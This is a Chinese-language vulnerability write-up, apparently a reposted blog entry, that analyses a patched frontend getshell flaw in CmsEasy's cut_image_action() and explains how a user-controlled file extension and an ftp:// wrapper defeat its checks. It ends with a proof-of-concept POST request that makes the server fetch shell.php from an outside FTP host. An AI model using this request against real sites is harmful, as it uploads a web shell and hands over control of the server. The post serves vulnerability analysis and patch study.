php strlen漏洞,CmsEasy前台无限制GetShell

最新推荐文章于 2022-04-14 16:21:14 发布
最新推荐文章于 2022-04-14 16:21:14 发布
阅读量2.8k 收藏
点赞数
文章标签: php strlen漏洞

来源:阿里先知(安全情报)

0142c468cc2d89f3e6a12c5e2b50a674.png

简要描述

CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话

前台getshell漏洞修正;

命令执行漏洞修正;

我们就根据补丁来分析一下这个前台Getshell漏洞。

漏洞详情

修改的文件不多,通过diff发现补丁中lib/default/tool_act.php 392行的cut_image_action()函数被注释了。

来看看这个函数/*function cut_image_action() {

$len = 1;

if(config::get('base_url') != '/'){

$len = strlen(config::get('base_url'))+1;

}

if(substr($_POST['pic'],0,4) == 'http'){

front::$post['thumb'] = str_ireplace(config::get('site_url'),'',$_POST['pic']);

}else{

front::$post['thumb'] = substr($_POST['pic'],$len);

}

$thumb=new thumb();

$thumb->set(front::$post['thumb'],'jpg');

$img=$thumb->create_image($thumb->im,$_POST['w'],$_POST['h'],0,0,$_POST['x1'],$_POST['y1'],$_POST['x2'] -$_POST['x1'],$_POST['y2'$new_name=$new_name_gbk=str_replace('.','',Time::getMicrotime()).'.'.end(explode('.',$_POST['pic']));

$save_file='upload/images/'.date('Ym').'/'.$new_name;

@mkdir(dirname(ROOT.'/'.$save_file));

ob_start();

$thumb->out_image($img,null,85);

file_put_contents(ROOT.'/'.$save_file,ob_get_contents());

ob_end_clean();

$image_url=config::get('base_url').'/'.$save_file;

//$res['size']=ceil(strlen($img) / 1024);

$res['code']="

//$('#cut_preview').attr('src','$image_url');

$('#thumb').val('$image_url');

alert(lang('save_success'));

";

echo json::encode($res);

}

*/

看保存文件名的生成$new_name=$new_name_gbk=str_replace('.','',Time::getMicrotime()).'.'.end(explode('.',$_POST['pic']));

不过这里利用需要一点技巧 直接用了$_POST['pic']的后缀做为新文件的扩展名,应该就是这里导致的getshell。

1、图片会经过php的图像库处理,如何在处理后仍然保留shell语句

2、远程加载图片需要通过file_exists函数的验证(要知道http(s)对于file_exists来说会固定返回false)

在正常图片中插入shell并无视图像库的处理 这个freebuf有介绍 国外也有不少分析,当然直接拿freebuf的方法应该是不成功的 需要一点小小的调整

关于file_exits()函数 ftp://协议就可以绕过 wrappers中有介绍

78a2a125c09856c29e47aecf9adcbd65.png$len = 1;

这里构造payload还有一点需要注意的5.0.0以上 就支持file_exists()了

if(config::get('base_url') != '/'){

$len = strlen(config::get('base_url'))+1;

}

if(substr($_POST['pic'],0,4) == 'http'){

front::$post['thumb'] =

str_ireplace(config::get('site_url'),'',$_POST['pic']);

}else{

front::$post['thumb'] = substr($_POST['pic'],$len);

}

所以构造的时候 如果站点不是放在根目录 则需要在前面补位strlen(base_url)+2 如果放在根目录 也需要补上1位('/'的长度)。如果$_POST['pic']开头4个字符不是http的话,就认为是本站的文件,会从前面抽取掉baseurl(等于返回文件相对路径)。

POC

POST /index.php?case=tool&act=cut_image

pic=111111111ftp://ludas.pw/shell.php&w=228&h=146&x1=0&x2=228&y1=0&y2=146

本地测试截图

e6871727623130903e19be2163d162c3.png

小婉青青
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CMSeasy v5.5任意权限getshell
08-28
CMSeasy任意权限getshell
PHP弱类型及绕过方式(二)
qidiandexiaowu
05-04 1518
继续!!! 目录: 0×01.md5加密相等绕过 0×02.十六进制与数字比较 0×03.ereg正则%00截断 0×04.strpos数组绕过 0×01.md5加密相等绕过 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &&am...
PHP函数绕过
慎铭的博客
02-17 508
md5()   md5() 函数计算字符串的 MD5 散列。md5() 函数使用 RSA 数据安全,包括 MD5 报文摘要算法。如需计算文件的 MD5 散列,请使用 md5_file() 函数。 语法 md5(string, raw) - string 不可缺省。规定要计算的字符串 - raw 可缺省。规定十六进制或二进制的输出格式: - TRUE - 原始 16 字符二进制格式 - FALSE - 默认。32 字符十六进制数 - 返回值 如果成功则返回已计算的 MD5 散列,如果失败则返回 FA
PHP函数漏洞总结
柠檬木有枝
08-26 2395
前言 本文主要针对 PHP 函数相关的漏洞的总结,可能会偏向 CTF 方面,内容肯定不全,有空的话会持续更新,欢迎各位表哥补充以及对文章错误之处进行斧正! 1 弱类型安全问题 1.1 == 弱类型比较缺陷 === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 (1)字符串的开始部分决定了它的值,如果该字符串以合法的数值开始,则使用该数值,否则其值则为0 var_dump("admin"==0); //true var_dump("1a
php ceil 漏洞,【技术分享】CmsEasy前台限制GetShell
weixin_39786706的博客
04-07 447
简要描述CMSEasy官方在2016-10-12发布了一个补丁,描述只有两句话前台getshell漏洞修正;命令执行漏洞修正;我们就根据补丁来分析一下这个前台Getshell漏洞漏洞详情修改的文件不多,通过diff发现补丁中lib/default/tool_act.php 392行的cut_image_action()函数被注释了。来看看这个函数/*functioncut_image_acti...
简单谈谈PHPstrlen 函数
10-22
PHP中,函数strlen()返回字符串的长度,strlen()函数返回字符串所占的字节长度,一个英文字母、数字、各种符号均占一个字节,它们的长度均为1
phpstrlen和mb_strlen用法实例分析
10-21
主要介绍了phpstrlen和mb_strlen用法,结合实例形式分析了strlen和mb_strlen针对中英文结合字符编码计算字符串长度的操作技巧,需要的朋友可以参考下
浅析PHPstrlen和mb_strlen的区别
10-25
php中常见的计算字符串长度的函数有:strlen和mb_strlen.当字符全是英文字符的时候,两者是一样。这里主要比较一下,中英文混排的时候,两个计算结果。
详解PHPstrlen和mb_strlen函数的区别
10-26
PHP中,strlen与mb_strlen是求字符串长度的函数,但是对于一些初学者来说,如果不看手册,也许不太清楚其中的区别
PHP字符串长度计算 - strlen()函数使用介绍
10-26
PHP中,函数strlen()返回字符串的长度,strlen()函数返回字符串所占的字节长度,一个英文字母、数字、各种符号均占一个字节,它们的长度均为1
php 去掉%3c p%3e,cmseasy csrf通过一个xss最后getshell
weixin_39609423的博客
03-28 2262
为什么我们要选择get类型的呢,因为get类型存储到数据库的时候触发时候管理员是察觉不到的,可以通过图片等进行操作,然后我们存储一个xss后门,这样一来,我们就可以加载一个远端的js,那么就各种无视token和referer了开始我们先分析一段源代码:celive/admin/system.php:(line:128-142):if($do == 'add' and $username != ''...
PHP代码/命令执行漏洞总结
坚持硬核
02-04 2013
由于没有针对代码中可执行的特殊函数入口做过滤,导致用户可以提交恶意语句,并交由服务器端执行。 代码/命令注入攻击中Web服务器没有过滤类似system(),eval(),exec()等函数的传入参数是该漏洞攻击成功的最主要原因。 代码注入相关函数: 1.mixed eval(string code_str) eval() 把字符串作为PHP代码执行 code_str是PHP代码字符串 2.bool assert ( mixed $assertion [, string $description
cmseasy最新版任意权限getshell
HandsomeOhJie的博客
07-02 1277
http://www.2cto.com/Article/201409/334131.html
CmsEasy20160825前台限制GetShell复现
weixin_34010949的博客
12-07 639
GetShell思路:根据里面漏洞代码直接取post数据后缀作为后缀这一特性,且CMS支持FTP。        利用FTP上传图片,通过下载上传的正常图片(已被PHP的GD库渲染)之后,        利用脚本在图片中插入payload,        再次利用FTP上传达到GET Shell的目的。 索马里师傅的post数据如下: POST /index.php?case=too...
php中提取%3cdiv,cmseasy getshell 0day
weixin_33644009的博客
03-18 223
by zvall代码如下:celive/index.php 代码:[php]$_SESSION['thislive'] = md5(time());$_SESSION['thislivetmp'] = $_SESSION['thislive'];if ($config['customer_info']) {header('Location: '.$config['url'].'/live/?act...
strlen 返回值的漏洞
qq_41071646的博客
12-31 2843
strlen 是一个统计字符串长度的函数  然后我们这次说的题 就是 关于strlen 返回值 造成 溢出的问题 在32的系统中 有这么一种情况   strlen 的结果的返回值给8位寄存器al  那么8位最多是多少? 255  如果我们 多输入会怎么办 我们如果输入257  二进制是多少呢 ‭000100000001‬  这个应该是没有什么好说的  那么假如我们输入了 257个字符 那么最后...
strlen引起的错误
热门推荐
永恒之爱的专栏
12-14 1万+
<br />今天运行程序时,发现程序某名其秒的死了,找来找去找不到原因死在哪里,后来叫了同事过来帮忙看一下,发现原来是strlen的错误,原来strlen不能对空指针用。<br />下面简单介绍一下strlen。<br /> <br />strlen所作的仅仅是一个计数器的工作,它从内存的某个位置(可以是字符串开头,中间某个位置,甚至是某个不确定的内存区域)开始扫描,直到碰到第一个字符串结束符'/0'为止,然后返回计数器值。<br />原型:extern unsigned int strlen(char *
strlen的陷阱
u011305848的博客
07-10 556
1.strlen函数在C语言中的头文件是&lt;string.h&gt;2.函数原型是 size_t strlen(const char *string) 3.typedef unsigned int size_t;4.char c[10] = {'I',' ','a','m',' ','h','a','p','p','y'};       //10个字符    申请10个字节的空间   int ...
c语言------小漏洞
qq_62414152的博客
04-14 719
`# include<stdio.h> include<string.h> int main(){ char str[20]; gets(str); str[11] = ‘\0’; puts(str); char ss[20]; ss[0] = 2; //ss = str; 数组不能这么操作 }` # include<stdio.h> # include<string.h> int main(){ char str[3]; gets(str); /
PHP strlen
最新发布
03-30
PHPstrlen函数是用来获取字符串的长度的。它返回一个字符串中字符的数量,不论是单字节字符还是多字节字符。这个函数非常简单,只需要传入一个字符串作为参数,然后返回该字符串的长度。 例如,如果我们有一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值